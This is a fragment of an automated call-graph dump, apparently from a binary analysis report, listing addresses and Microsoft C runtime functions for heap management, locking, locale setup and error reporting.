4d883c2 __lock 43 API calls 15647->15650 15654 4d842bc FindHandler __dosmaperr 15647->15654 15649 4d84297 HeapFree 15648->15649 15648->15654 15651 4d842a9 15649->15651 15649->15654 15655 4d8425a ___sbh_find_block 15650->15655 15652 4d85b1f __free_osfhnd 43 API calls 15651->15652 15653 4d842ae GetLastError 15652->15653 15653->15654 15654->15461 15656 4d84274 15655->15656 16378 4d88509 15655->16378 16382 4d8428d 15656->16382 15660 4d8b158 15659->15660 15661 4d8b1a3 15659->15661 15664 4d8add8 __decode_pointer 2 API calls 15660->15664 15662 4d8b1ae TlsSetValue 15661->15662 15663 4d8b1b7 15661->15663 15662->15663 15663->15431 15665 4d8b19a 15664->15665 16386 4d8b02e 15665->16386 15678 4d895c4 15667->15678 15672 4d89412 15692 4d89673 15672->15692 15673 4d8942d 15673->15497 15676 4d88496 RtlAllocateHeap 15673->15676 15674 4d8941e 15674->15673 15675 4d85973 __invoke_watson 10 API calls 15674->15675 15675->15673 15677 4d884b2 15676->15677 15677->15497 15677->15500 15679 4d895cf 15678->15679 15680 4d89403 15679->15680 15699 4d85b1f 15679->15699 15680->15672 15685 4d85973 15680->15685 15720 4d8c4a0 15685->15720 15687 4d85a04 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15688 4d85a47 GetCurrentProcess TerminateProcess 15687->15688 15691 4d85a3b __invoke_watson 15687->15691 15722 4d839fc 15688->15722 15690 4d85a67 15690->15672 15691->15688 15693 4d8967e 15692->15693 15694 4d896a3 15693->15694 15695 4d85b1f __free_osfhnd 45 API calls 15693->15695 15694->15674 15696 4d89683 15695->15696 15697 4d85aa7 __getenv_s_helper 2 API calls 15696->15697 15698 4d89693 15697->15698 15698->15674 15705 4d8af93 GetLastError 15699->15705 15701 4d85b24 15702 4d85aa7 15701->15702 15703 4d8add8 __decode_pointer 2 API calls 15702->15703 15704 4d85ab5 __invoke_watson 15702->15704 15703->15704 15706 4d8ae5f ___set_flsgetvalue 4 API calls 15705->15706 15707 4d8afa2 TlsGetValue 15706->15707 15708 4d8afb6 15707->15708 15709 4d8b00a SetLastError 15708->15709 15710 4d8b5a1 __calloc_crt 41 API calls 15708->15710 15709->15701 15711 4d8afc8 15710->15711 15711->15709 15712 4d8add8 __decode_pointer 2 API calls 15711->15712 15713 4d8afe2 15712->15713 15714 4d8afe9 15713->15714 15715 4d8b001 15713->15715 15716 4d8aedf __initptd 41 API calls 15714->15716 15717 4d84237 __setlocale_set_cat 41 API calls 15715->15717 15718 4d8aff1 GetCurrentThreadId 15716->15718 15719 4d8b007 15717->15719 15718->15709 15719->15709 15721 4d8c4ac __VEC_memzero 15720->15721 15721->15687 15723 4d83a04 15722->15723 15724 4d83a06 IsDebuggerPresent 15722->15724 15723->15690 15730 4d93508 15724->15730 15727 4d8b4f7 SetUnhandledExceptionFilter UnhandledExceptionFilter 15728 4d8b51c GetCurrentProcess TerminateProcess 15727->15728 15729 4d8b514 __invoke_watson 15727->15729 15728->15690 15729->15728 15730->15727 15749 4d8adcf 15731->15749 15733 4d898ff __init_pointers 15752 4d8b3cb 15733->15752 15736 4d8ad6c __encode_pointer 3 API calls 15737 4d8993b 15736->15737 15738 4d8ad6c 15737->15738 15739 4d8ad7b 15738->15739 15740 4d8ada0 GetModuleHandleA 15739->15740 15744 4d8ad98 15739->15744 15741 4d8adc9 15740->15741 15742 4d8adaf GetProcAddress 15740->15742 15741->15513 15742->15744 15743 4d8adbf RtlEncodePointer 15743->15741 15744->15741 15744->15743 15746 4d8823d 15745->15746 15748 4d8826b 15746->15748 15755 4d96511 15746->15755 15748->15521 15748->15522 15750 4d8ad6c __encode_pointer 3 API calls 15749->15750 15751 4d8add6 15750->15751 15751->15733 15753 4d8ad6c __encode_pointer 3 API calls 15752->15753 15754 4d89931 15753->15754 15754->15736 15756 4d9651d FindHandler 15755->15756 15757 4d8add8 __decode_pointer 2 API calls 15756->15757 15758 4d9652d 15757->15758 15759 4d895c4 ___crtInitCritSecAndSpinCount 43 API calls 15758->15759 15766 4d96581 FindHandler 15758->15766 15760 4d9653d 15759->15760 15761 4d9654c 15760->15761 15764 4d85973 __invoke_watson 10 API calls 15760->15764 15762 4d96555 GetModuleHandleA 15761->15762 15763 4d96576 15761->15763 15762->15763 15765 4d96564 GetProcAddress 15762->15765 15767 4d8ad6c __encode_pointer 3 API calls 15763->15767 15764->15761 15765->15763 15766->15746 15767->15766 15769 4d8b565 15768->15769 15771 4d8b59c 15769->15771 15772 4d8b57d Sleep 15769->15772 15773 4d83558 15769->15773 15771->15545 15771->15551 15771->15553 15772->15769 15774 4d83605 15773->15774 15780 4d83566 15773->15780 15775 4d89b8f __calloc_impl 2 API calls 15774->15775 15776 4d8360b 15775->15776 15778 4d85b1f __free_osfhnd 45 API calls 15776->15778 15779 4d83611 15778->15779 15779->15769 15784 4d835fc 15780->15784 15785 4d835f0 15780->15785 15788 4d835ee 15780->15788 15790 4d89b05 15780->15790 15799 4d89945 15780->15799 15833 4d89565 15780->15833 15836 4d83494 15780->15836 15844 4d89b8f 15780->15844 15784->15769 15787 4d85b1f __free_osfhnd 45 API calls 15785->15787 15787->15788 15789 4d85b1f __free_osfhnd 45 API calls 15788->15789 15789->15784 15847 4d969e6 15790->15847 15792 4d89b0c 15793 4d89b19 15792->15793 15795 4d969e6 __NMSG_WRITE 45 API calls 15792->15795 15794 4d89945 __NMSG_WRITE 45 API calls 15793->15794 15797 4d89b3b 15793->15797 15796 4d89b31 15794->15796 15795->15793 15798 4d89945 __NMSG_WRITE 45 API calls 15796->15798 15797->15780 15798->15797 15800 4d89951 15799->15800 15801 4d89aa7 15800->15801 15802 4d969e6 __NMSG_WRITE 42 API calls 15800->15802 15801->15780 15803 4d89971 15802->15803 15804 4d89aac GetStdHandle 15803->15804 15806 4d969e6 __NMSG_WRITE 42 API calls 15803->15806 15804->15801 15805 4d89aba _strlen 15804->15805 15805->15801 15809 4d89ad4 WriteFile 15805->15809 15807 4d89982 15806->15807 15807->15804 15808 4d89994 15807->15808 15808->15801 15854 4d8c0d2 15808->15854 15809->15801 15812 4d899ca GetModuleFileNameA 15814 4d899e8 15812->15814 15818 4d89a0b _strlen 15812->15818 15813 4d85973 __invoke_watson 10 API calls 15815 4d899c7 15813->15815 15816 4d8c0d2 _strcpy_s 42 API calls 15814->15816 15815->15812 15817 4d899f8 15816->15817 15817->15818 15820 4d85973 __invoke_watson 10 API calls 15817->15820 15819 4d89a4e 15818->15819 15863 4d8f5d6 15818->15863 15872 4d8f51b 15819->15872 15820->15818 15825 4d89a72 15827 4d8f51b _strcat_s 42 API calls 15825->15827 15826 4d85973 __invoke_watson 10 API calls 15826->15825 15829 4d89a83 15827->15829 15828 4d85973 __invoke_watson 10 API calls 15828->15819 15830 4d89a94 15829->15830 15831 4d85973 __invoke_watson 10 API calls 15829->15831 15881 4d96848 15830->15881 15831->15830 15915 4d8953f GetModuleHandleA 15833->15915 15837 4d834a0 FindHandler 15836->15837 15838 4d834d1 FindHandler 15837->15838 15918 4d883c2 15837->15918 15838->15780 15840 4d834b6 15925 4d89109 15840->15925 15845 4d8add8 __decode_pointer 2 API calls 15844->15845 15846 4d89b9a 15845->15846 15846->15780 15848 4d969f1 15847->15848 15849 4d85b1f __free_osfhnd 45 API calls 15848->15849 15850 4d969fb 15848->15850 15851 4d96a14 15849->15851 15850->15792 15852 4d85aa7 __getenv_s_helper 2 API calls 15851->15852 15853 4d96a24 15852->15853 15853->15792 15855 4d8c0df 15854->15855 15856 4d8c0e7 15854->15856 15855->15856 15858 4d8c10e 15855->15858 15857 4d85b1f __free_osfhnd 45 API calls 15856->15857 15862 4d8c0ec 15857->15862 15860 4d899b6 15858->15860 15861 4d85b1f __free_osfhnd 45 API calls 15858->15861 15859 4d85aa7 __getenv_s_helper 2 API calls 15859->15860 15860->15812 15860->15813 15861->15862 15862->15859 15867 4d8f5e6 15863->15867 15864 4d8f5ea 15865 4d89a3b 15864->15865 15866 4d85b1f __free_osfhnd 45 API calls 15864->15866 15865->15819 15865->15828 15868 4d8f606 15866->15868 15867->15864 15867->15865 15870 4d8f630 15867->15870 15869 4d85aa7 __getenv_s_helper 2 API calls 15868->15869 15869->15865 15870->15865 15871 4d85b1f __free_osfhnd 45 API calls 15870->15871 15871->15868 15873 4d8f530 15872->15873 15876 4d8f528 15872->15876 15874 4d85b1f __free_osfhnd 45 API calls 15873->15874 15875 4d8f535 15874->15875 15877 4d85aa7 __getenv_s_helper 2 API calls 15875->15877 15876->15873 15879 4d8f565 15876->15879 15878 4d89a61 15877->15878 15878->15825 15878->15826 15879->15878 15880 4d85b1f __free_osfhnd 45 API calls 15879->15880 15880->15875 15882 4d8adcf __init_pointers 3 API calls 15881->15882 15883 4d96856 15882->15883 15884 4d96870 LoadLibraryA 15883->15884 15889 4d96917 15883->15889 15886 4d96888 15884->15886 15887 4d96881 15884->15887 15885 4d96996 15888 4d9697b 15885->15888 15890 4d8add8 __decode_pointer 2 API calls 15885->15890 15886->15887 15894 4d8ad6c __encode_pointer 3 API calls 15886->15894 15887->15801 15891 4d8add8 __decode_pointer 2 API calls 15888->15891 15889->15885 15892 4d8add8 __decode_pointer 2 API calls 15889->15892 15898 4d969a5 15890->15898 15891->15887 15893 4d96937 15892->15893 15896 4d96963 15893->15896 15897 4d8add8 __decode_pointer 2 API calls 15893->15897 15895 4d968a0 15894->15895 15901 4d8ad6c __encode_pointer 3 API calls 15895->15901 15899 4d89673 ___crtMessageBoxA 44 API calls 15896->15899 15900 4d96956 15897->15900 15898->15888 15902 4d8add8 __decode_pointer 2 API calls 15898->15902 15903 4d9696c 15899->15903 15900->15885 15900->15896 15904 4d968b5 15901->15904 15902->15888 15903->15888 15905 4d85973 __invoke_watson 10 API calls 15903->15905 15906 4d8ad6c __encode_pointer 3 API calls 15904->15906 15905->15888 15907 4d968ca 15906->15907 15908 4d895c4 ___crtInitCritSecAndSpinCount 44 API calls 15907->15908 15909 4d968d8 15908->15909 15910 4d968e8 15909->15910 15911 4d85973 __invoke_watson 10 API calls 15909->15911 15910->15889 15912 4d8ad6c __encode_pointer 3 API calls 15910->15912 15911->15910 15913 4d968ff 15912->15913 15913->15889 15914 4d8ad6c __encode_pointer 3 API calls 15913->15914 15914->15889 15916 4d8954e GetProcAddress 15915->15916 15917 4d8955e ExitProcess 15915->15917 15916->15917 15919 4d883e8 RtlEnterCriticalSection 15918->15919 15920 4d883d5 15918->15920 15919->15840 15934 4d882ff 15920->15934 15922 4d883db 15922->15919 15960 4d8951b 15922->15960 15927 4d89135 15925->15927 15926 4d891ce 15930 4d834c1 15926->15930 15978 4d888cd 15926->15978 15927->15926 15927->15930 15971 4d8881d 15927->15971 15931 4d834da 15930->15931 15982 4d882d2 RtlLeaveCriticalSection 15931->15982 15933 4d834e1 15933->15838 15935 4d8830b FindHandler 15934->15935 15936 4d89b05 __FF_MSGBANNER 45 API calls 15935->15936 15949 4d88331 15935->15949 15939 4d88320 15936->15939 15937 4d88341 FindHandler 15937->15922 15938 4d8b561 __malloc_crt 45 API calls 15940 4d8834c 15938->15940 15941 4d89945 __NMSG_WRITE 45 API calls 15939->15941 15942 4d88362 15940->15942 15943 4d88353 15940->15943 15944 4d88327 15941->15944 15946 4d883c2 __lock 45 API calls 15942->15946 15945 4d85b1f __free_osfhnd 45 API calls 15943->15945 15947 4d89565 __mtinitlocknum 3 API calls 15944->15947 15945->15937 15948 4d88369 15946->15948 15947->15949 15950 4d8839d 15948->15950 15951 4d88371 15948->15951 15949->15937 15949->15938 15952 4d84237 __setlocale_set_cat 45 API calls 15950->15952 15953 4d96511 ___crtInitCritSecAndSpinCount 45 API calls 15951->15953 15954 4d8838e 15952->15954 15955 4d8837c 15953->15955 15967 4d883b9 15954->15967 15955->15954 15957 4d84237 __setlocale_set_cat 45 API calls 15955->15957 15958 4d88388 15957->15958 15959 4d85b1f __free_osfhnd 45 API calls 15958->15959 15959->15954 15961 4d89b05 __FF_MSGBANNER 45 API calls 15960->15961 15962 4d89520 15961->15962 15963 4d89945 __NMSG_WRITE 45 API calls 15962->15963 15964 4d89529 15963->15964 15965 4d8add8 __decode_pointer 2 API calls 15964->15965 15966 4d883e7 15965->15966 15966->15919 15970 4d882d2 RtlLeaveCriticalSection 15967->15970 15969 4d883c0 15969->15937 15970->15969 15972 4d88830 RtlReAllocateHeap 15971->15972 15973 4d88864 RtlAllocateHeap 15971->15973 15974 4d88852 15972->15974 15977 4d8884e 15972->15977 15975 4d88887 VirtualAlloc 15973->15975 15973->15977 15974->15973 15976 4d888a1 HeapFree 15975->15976 15975->15977 15976->15977 15977->15926 15979 4d888e2 VirtualAlloc 15978->15979 15981 4d88929 15979->15981 15981->15930 15982->15933 15983->15556 15985 4d8f50d 15984->15985 15986 4d8f506 15984->15986 15985->15584 15994 4d8f363 15986->15994 15990 4d8ba2e 15988->15990 15992 4d8ba9b 15990->15992 16228 4d97100 15990->16228 15991 4d8bb99 15991->15588 15991->15590 15992->15991 15993 4d97100 47 API calls _parse_cmdline 15992->15993 15993->15992 15995 4d8f36f FindHandler 15994->15995 16022 4d8b016 15995->16022 15999 4d8f382 16043 4d8f102 15999->16043 16002 4d8b561 __malloc_crt 45 API calls 16003 4d8f3a3 16002->16003 16004 4d8f4c2 FindHandler 16003->16004 16050 4d8f17c 16003->16050 16004->15985 16007 4d8f3d3 InterlockedDecrement 16009 4d8f3e3 16007->16009 16014 4d8f3f3 16007->16014 16008 4d8f4cf 16008->16004 16010 4d8f4e2 16008->16010 16011 4d84237 __setlocale_set_cat 45 API calls 16008->16011 16012 4d84237 __setlocale_set_cat 45 API calls 16009->16012 16009->16014 16013 4d85b1f __free_osfhnd 45 API calls 16010->16013 16011->16010 16012->16014 16013->16004 16014->16004 16015 4d883c2 __lock 45 API calls 16014->16015 16017 4d8f41e InterlockedDecrement 16015->16017 16018 4d8f49a 16017->16018 16019 4d8f4ac 16017->16019 16018->16019 16020 4d84237 __setlocale_set_cat 45 API calls 16018->16020 16059 4d8f4c4 16019->16059 16020->16019 16023 4d8af93 __getptd_noexit 45 API calls 16022->16023 16024 4d8b01c 16023->16024 16025 4d8b029 16024->16025 16026 4d8951b __amsg_exit 45 API calls 16024->16026 16027 4d8f05e 16025->16027 16026->16025 16028 4d8f06a FindHandler 16027->16028 16029 4d8b016 __setlocale_set_cat 45 API calls 16028->16029 16030 4d8f06f 16029->16030 16031 4d883c2 __lock 45 API calls 16030->16031 16039 4d8f081 16030->16039 16032 4d8f09f 16031->16032 16033 4d8f0e8 16032->16033 16034 4d8f0d0 InterlockedIncrement 16032->16034 16035 4d8f0b6 InterlockedDecrement 16032->16035 16062 4d8f0f9 16033->16062 16034->16033 16035->16034 16038 4d8f0c1 16035->16038 16037 4d8951b __amsg_exit 45 API calls 16040 4d8f08f FindHandler 16037->16040 16038->16034 16041 4d84237 __setlocale_set_cat 45 API calls 16038->16041 16039->16037 16039->16040 16040->15999 16042 4d8f0cf 16041->16042 16042->16034 16066 4d85e16 16043->16066 16046 4d8f13d 16048 4d8f142 GetACP 16046->16048 16049 4d8f12f 16046->16049 16047 4d8f11f GetOEMCP 16047->16049 16048->16049 16049->16002 16049->16004 16051 4d8f102 getSystemCP 49 API calls 16050->16051 16052 4d8f19a 16051->16052 16053 4d8f1a5 setSBCS 16052->16053 16054 4d8f1cd GetCPInfo 16052->16054 16057 4d8f1e0 _memset __setmbcp_nolock 16052->16057 16055 4d839fc __setlocale_set_cat 5 API calls 16053->16055 16054->16053 16054->16057 16056 4d8f325 16055->16056 16056->16007 16056->16008 16127 4d8eed4 GetCPInfo 16057->16127 16227 4d882d2 RtlLeaveCriticalSection 16059->16227 16061 4d8f4cb 16061->16004 16065 4d882d2 RtlLeaveCriticalSection 16062->16065 16064 4d8f100 16064->16039 16065->16064 16067 4d85e25 16066->16067 16073 4d85e72 16066->16073 16068 4d8b016 __setlocale_set_cat 45 API calls 16067->16068 16069 4d85e2a 16068->16069 16070 4d85e52 16069->16070 16074 4d8477e 16069->16074 16072 4d8f05e __setmbcp 47 API calls 16070->16072 16070->16073 16072->16073 16073->16046 16073->16047 16075 4d8478a FindHandler 16074->16075 16076 4d8b016 __setlocale_set_cat 45 API calls 16075->16076 16077 4d8478f 16076->16077 16078 4d847bd 16077->16078 16080 4d847a1 16077->16080 16079 4d883c2 __lock 45 API calls 16078->16079 16081 4d847c4 16079->16081 16082 4d8b016 __setlocale_set_cat 45 API calls 16080->16082 16089 4d84740 16081->16089 16084 4d847a6 16082->16084 16087 4d847b4 FindHandler 16084->16087 16088 4d8951b __amsg_exit 45 API calls 16084->16088 16087->16070 16088->16087 16090 4d84776 16089->16090 16091 4d84744 ___addlocaleref ___removelocaleref 16089->16091 16093 4d847e8 16090->16093 16091->16090 16096 4d844ca 16091->16096 16126 4d882d2 RtlLeaveCriticalSection 16093->16126 16095 4d847ef 16095->16084 16097 4d844de 16096->16097 16098 4d8454b 16096->16098 16097->16098 16104 4d84512 16097->16104 16110 4d84237 __setlocale_set_cat 45 API calls 16097->16110 16099 4d84598 16098->16099 16100 4d84237 __setlocale_set_cat 45 API calls 16098->16100 16101 4d8d0ee ___free_lc_time 45 API calls 16099->16101 16107 4d845bf 16099->16107 16102 4d8456c 16100->16102 16103 4d845b8 16101->16103 16106 4d84237 __setlocale_set_cat 45 API calls 16102->16106 16111 4d84237 __setlocale_set_cat 45 API calls 16103->16111 16105 4d84533 16104->16105 16116 4d84237 __setlocale_set_cat 45 API calls 16104->16116 16108 4d84237 __setlocale_set_cat 45 API calls 16105->16108 16112 4d8457f 16106->16112 16109 4d845fe 16107->16109 16117 4d84237 45 API calls __setlocale_set_cat 16107->16117 16113 4d84540 16108->16113 16114 4d84237 __setlocale_set_cat 45 API calls 16109->16114 16115 4d84507 16110->16115 16111->16107 16118 4d84237 __setlocale_set_cat 45 API calls 16112->16118 16119 4d84237 __setlocale_set_cat 45 API calls 16113->16119 16120 4d84604 16114->16120 16121 4d8d52c ___free_lconv_mon 45 API calls 16115->16121 16122 4d84528 16116->16122 16117->16107 16123 4d8458d 16118->16123 16119->16098 16120->16090 16121->16104 16124 4d8d324 ___free_lconv_num 45 API calls 16122->16124 16125 4d84237 __setlocale_set_cat 45 API calls 16123->16125 16124->16105 16125->16099 16126->16095 16128 4d8efb4 16127->16128 16130 4d8ef0b _memset 16127->16130 16133 4d839fc __setlocale_set_cat 5 API calls 16128->16133 16137 4d92bd0 16130->16137 16135 4d8f056 16133->16135 16135->16057 16136 4d9cb4e ___crtLCMapStringA 58 API calls 16136->16128 16138 4d85e16 _LocaleUpdate::_LocaleUpdate 47 API calls 16137->16138 16139 4d92be1 16138->16139 16147 4d92a18 16139->16147 16142 4d9cb4e 16143 4d85e16 _LocaleUpdate::_LocaleUpdate 47 API calls 16142->16143 16144 4d9cb5f 16143->16144 16192 4d9c7ac 16144->16192 16148 4d92a62 16147->16148 16149 4d92a37 GetStringTypeW 16147->16149 16150 4d92b49 16148->16150 16159 4d92a4f 16148->16159 16151 4d92a57 GetLastError 16149->16151 16149->16159 16172 4d9da64 GetLocaleInfoA 16150->16172 16151->16148 16153 4d839fc __setlocale_set_cat 5 API calls 16155 4d8ef6f 16153->16155 16155->16142 16156 4d92b9a GetStringTypeA 16158 4d92bb5 16156->16158 16163 4d92b43 16156->16163 16161 4d84237 __setlocale_set_cat 45 API calls 16158->16161 16162 4d92add _memset __crtGetLocaleInfoW_stat 16159->16162 16159->16163 16164 4d83558 _malloc 45 API calls 16159->16164 16161->16163 16162->16163 16165 4d92b3d 16162->16165 16166 4d92b2c GetStringTypeW 16162->16166 16163->16153 16164->16162 16168 4d8dcd4 16165->16168 16166->16165 16169 4d8dcdc 16168->16169 16171 4d8dced 16168->16171 16170 4d84237 __setlocale_set_cat 45 API calls 16169->16170 16169->16171 16170->16171 16171->16163 16173 4d9da90 16172->16173 16174 4d9da95 16172->16174 16176 4d839fc __setlocale_set_cat 5 API calls 16173->16176 16175 4d9d63c UnDecorator::getZName 52 API calls 16174->16175 16175->16173 16177 4d92b6d 16176->16177 16177->16156 16177->16163 16178 4d9daab 16177->16178 16181 4d9db73 16178->16181 16182 4d9dae9 _strlen 16178->16182 16179 4d839fc __setlocale_set_cat 5 API calls 16180 4d92b8e 16179->16180 16180->16156 16180->16163 16181->16179 16182->16181 16183 4d83558 _malloc 45 API calls 16182->16183 16184 4d9db4b _memset __crtGetLocaleInfoW_stat 16182->16184 16183->16184 16184->16181 16185 4d9dbe4 16184->16185 16186 4d9dbc7 WideCharToMultiByte 16184->16186 16188 4d9dbdf 16184->16188 16185->16188 16189 4d8b5a1 __calloc_crt 45 API calls 16185->16189 16186->16188 16187 4d8dcd4 __freea 45 API calls 16187->16181 16188->16187 16190 4d9dc0b 16189->16190 16190->16188 16191 4d84237 __setlocale_set_cat 45 API calls 16190->16191 16191->16188 16193 4d9c7cb LCMapStringW 16192->16193 16196 4d9c7e6 16192->16196 16194 4d9c7ee GetLastError 16193->16194 16193->16196 16194->16196 16195 4d9c9e3 16197 4d9da64 ___ansicp 53 API calls 16195->16197 16196->16195 16206 4d9c840 16196->16206 16198 4d9ca0b 16197->16198 16201 4d9caff LCMapStringA 16198->16201 16202 4d9ca24 16198->16202 16209 4d9c9da 16198->16209 16199 4d839fc __setlocale_set_cat 5 API calls 16200 4d8ef8f 16199->16200 16200->16136 16226 4d9ca5b 16201->16226 16203 4d9daab ___convertcp 46 API calls 16202->16203 16211 4d9ca36 16203->16211 16204 4d9cb26 16208 4d84237 __setlocale_set_cat 45 API calls 16204->16208 16204->16209 16205 4d84237 __setlocale_set_cat 45 API calls 16205->16204 16207 4d83558 _malloc 45 API calls 16206->16207 16206->16209 16214 4d9c89f __crtGetLocaleInfoW_stat 16206->16214 16207->16214 16208->16209 16209->16199 16210 4d8dcd4 __freea 45 API calls 16210->16209 16211->16209 16212 4d9ca73 _memset __crtGetLocaleInfoW_stat 16211->16212 16213 4d83558 _malloc 45 API calls 16211->16213 16211->16226 16218 4d9cacd 16212->16218 16221 4d9daab ___convertcp 46 API calls 16212->16221 16212->16226 16213->16212 16214->16209 16216 4d9c95d __crtGetLocaleInfoW_stat 16214->16216 16217 4d83558 _malloc 45 API calls 16214->16217 16225 4d9c919 16214->16225 16215 4d9c991 LCMapStringW 16219 4d9c9a9 WideCharToMultiByte 16215->16219 16220 4d9c9cb 16215->16220 16216->16215 16216->16225 16217->16216 16223 4d8dcd4 __freea 45 API calls 16218->16223 16219->16220 16222 4d8dcd4 __freea 45 API calls 16220->16222 16221->16218 16222->16225 16223->16226 16225->16210 16226->16204 16226->16205 16227->16061 16231 4d96f42 16228->16231 16232 4d85e16 _LocaleUpdate::_LocaleUpdate 47 API calls 16231->16232 16233 4d96f53 16232->16233 16233->15990 16235 4d94353 16234->16235 16236 4d8ad6c __encode_pointer 3 API calls 16235->16236 16237 4d9436b 16235->16237 16236->16235 16237->15610 16241 4d83e09 16238->16241 16240 4d83e4e 16240->15612 16242 4d83e15 FindHandler 16241->16242 16249 4d8957a 16242->16249 16248 4d83e36 FindHandler 16248->16240 16250 4d883c2 __lock 45 API calls 16249->16250 16251 4d83e1a 16250->16251 16252 4d83d2d 16251->16252 16253 4d8add8 __decode_pointer 2 API calls 16252->16253 16254 4d83d3d 16253->16254 16255 4d8add8 __decode_pointer 2 API calls 16254->16255 16256 4d83d4e 16255->16256 16257 4d83dc8 16256->16257 16270 4d8c02f 16256->16270 16267 4d83e3f 16257->16267 16259 4d83db3 16260 4d8ad6c __encode_pointer 3 API calls 16259->16260 16260->16257 16261 4d83d8a 16261->16257 16264 4d8b5e9 __realloc_crt 51 API calls 16261->16264 16265 4d83da1 16261->16265 16262 4d83d68 16262->16259 16262->16261 16283 4d8b5e9 16262->16283 16264->16265 16265->16257 16266 4d8ad6c __encode_pointer 3 API calls 16265->16266 16266->16259 16332 4d89583 16267->16332 16271 4d8c03b FindHandler 16270->16271 16272 4d8c068 16271->16272 16273 4d8c04b 16271->16273 16274 4d8c0a9 RtlSizeHeap 16272->16274 16277 4d883c2 __lock 45 API calls 16272->16277 16275 4d85b1f __free_osfhnd 45 API calls 16273->16275 16279 4d8c060 FindHandler 16274->16279 16276 4d8c050 16275->16276 16278 4d85aa7 __getenv_s_helper 2 API calls 16276->16278 16280 4d8c078 ___sbh_find_block 16277->16280 16278->16279 16279->16262 16288 4d8c0c9 16280->16288 16286 4d8b5ed 16283->16286 16285 4d8b62f 16285->16261 16286->16285 16287 4d8b610 Sleep 16286->16287 16292 4d96ce0 16286->16292 16287->16286 16291 4d882d2 RtlLeaveCriticalSection 16288->16291 16290 4d8c0a4 16290->16274 16290->16279 16291->16290 16293 4d96cec FindHandler 16292->16293 16294 4d96d01 16293->16294 16295 4d96cf3 16293->16295 16297 4d96d08 16294->16297 16298 4d96d14 16294->16298 16296 4d83558 _malloc 45 API calls 16295->16296 16313 4d96cfb FindHandler __dosmaperr 16296->16313 16299 4d84237 __setlocale_set_cat 45 API calls 16297->16299 16305 4d96e86 16298->16305 16326 4d96d21 ___sbh_resize_block ___sbh_find_block 16298->16326 16299->16313 16300 4d96eb9 16301 4d89b8f __calloc_impl 2 API calls 16300->16301 16304 4d96ebf 16301->16304 16302 4d883c2 __lock 45 API calls 16302->16326 16303 4d96e8b RtlReAllocateHeap 16303->16305 16303->16313 16306 4d85b1f __free_osfhnd 45 API calls 16304->16306 16305->16300 16305->16303 16307 4d96edd 16305->16307 16308 4d89b8f __calloc_impl 2 API calls 16305->16308 16310 4d96ed3 16305->16310 16306->16313 16309 4d85b1f __free_osfhnd 45 API calls 16307->16309 16307->16313 16308->16305 16311 4d96ee6 GetLastError 16309->16311 16314 4d85b1f __free_osfhnd 45 API calls 16310->16314 16311->16313 16313->16286 16316 4d96e54 16314->16316 16315 4d96dac RtlAllocateHeap 16315->16326 16316->16313 16318 4d96e59 GetLastError 16316->16318 16317 4d96e01 RtlReAllocateHeap 16317->16326 16318->16313 16319 4d89109 ___sbh_alloc_block 5 API calls 16319->16326 16320 4d96e6c 16320->16313 16322 4d85b1f __free_osfhnd 45 API calls 16320->16322 16321 4d89b8f __calloc_impl 2 API calls 16321->16326 16323 4d96e79 16322->16323 16323->16311 16323->16313 16324 4d96e4f 16325 4d85b1f __free_osfhnd 45 API calls 16324->16325 16325->16316 16326->16300 16326->16302 16326->16313 16326->16315 16326->16317 16326->16319 16326->16320 16326->16321 16326->16324 16327 4d88509 HeapFree ___sbh_free_block 16326->16327 16328 4d96e24 16326->16328 16327->16326 16331 4d882d2 RtlLeaveCriticalSection 16328->16331 16330 4d96e2b 16330->16326 16331->16330 16335 4d882d2 RtlLeaveCriticalSection 16332->16335 16334 4d83e44 16334->16248 16335->16334 16337 4d897f7 FindHandler 16336->16337 16338 4d883c2 __lock 45 API calls 16337->16338 16339 4d897fe 16338->16339 16340 4d8983a _doexit 16339->16340 16342 4d8add8 __decode_pointer 2 API calls 16339->16342 16350 4d898a4 16340->16350 16343 4d8982d 16342->16343 16346 4d8add8 __decode_pointer 2 API calls 16343->16346 16345 4d898a1 FindHandler 16345->15620 16346->16340 16348 4d89898 16349 4d89565 __mtinitlocknum 3 API calls 16348->16349 16349->16345 16351 4d898aa 16350->16351 16352 4d89885 16350->16352 16355 4d882d2 RtlLeaveCriticalSection 16351->16355 16352->16345 16354 4d882d2 RtlLeaveCriticalSection 16352->16354 16354->16348 16355->16352 16357 4d96b8f FindHandler 16356->16357 16358 4d96ba7 16357->16358 16363 4d96bc6 _memset 16357->16363 16359 4d85b1f __free_osfhnd 44 API calls 16358->16359 16360 4d96bac 16359->16360 16361 4d85aa7 __getenv_s_helper 2 API calls 16360->16361 16366 4d96bbc FindHandler 16361->16366 16362 4d96c38 RtlAllocateHeap 16362->16363 16363->16362 16364 4d89b8f __calloc_impl 2 API calls 16363->16364 16365 4d883c2 __lock 44 API calls 16363->16365 16363->16366 16367 4d89109 ___sbh_alloc_block 5 API calls 16363->16367 16369 4d96c7f 16363->16369 16364->16363 16365->16363 16366->15628 16367->16363 16372 4d882d2 RtlLeaveCriticalSection 16369->16372 16371 4d96c86 16371->16363 16372->16371 16373->15639 16377 4d882d2 RtlLeaveCriticalSection 16374->16377 16376 4d8af91 16376->15645 16377->16376 16379 4d887e8 16378->16379 16380 4d88546 16378->16380 16379->15656 16380->16379 16381 4d887ad HeapFree 16380->16381 16381->16379 16385 4d882d2 RtlLeaveCriticalSection 16382->16385 16384 4d84294 16384->15648 16385->16384 16387 4d8b03a FindHandler 16386->16387 16388 4d8b052 16387->16388 16389 4d84237 __setlocale_set_cat 45 API calls 16387->16389 16391 4d8b12e FindHandler 16387->16391 16390 4d8b060 16388->16390 16392 4d84237 __setlocale_set_cat 45 API calls 16388->16392 16389->16388 16393 4d8b06e 16390->16393 16394 4d84237 __setlocale_set_cat 45 API calls 16390->16394 16391->15661 16392->16390 16395 4d8b07c 16393->16395 16396 4d84237 __setlocale_set_cat 45 API calls 16393->16396 16394->16393 16397 4d8b08a 16395->16397 16398 4d84237 __setlocale_set_cat 45 API calls 16395->16398 16396->16395 16399 4d8b098 16397->16399 16400 4d84237 __setlocale_set_cat 45 API calls 16397->16400 16398->16397 16401 4d8b0a9 16399->16401 16402 4d84237 __setlocale_set_cat 45 API calls 16399->16402 16400->16399 16403 4d883c2 __lock 45 API calls 16401->16403 16402->16401 16404 4d8b0b1 16403->16404 16405 4d8b0bd InterlockedDecrement 16404->16405 16406 4d8b0d6 16404->16406 16405->16406 16407 4d8b0c8 16405->16407 16418 4d8b13a 16406->16418 16407->16406 16410 4d84237 __setlocale_set_cat 45 API calls 16407->16410 16410->16406 16411 4d883c2 __lock 45 API calls 16412 4d8b0ea ___removelocaleref 16411->16412 16416 4d844ca 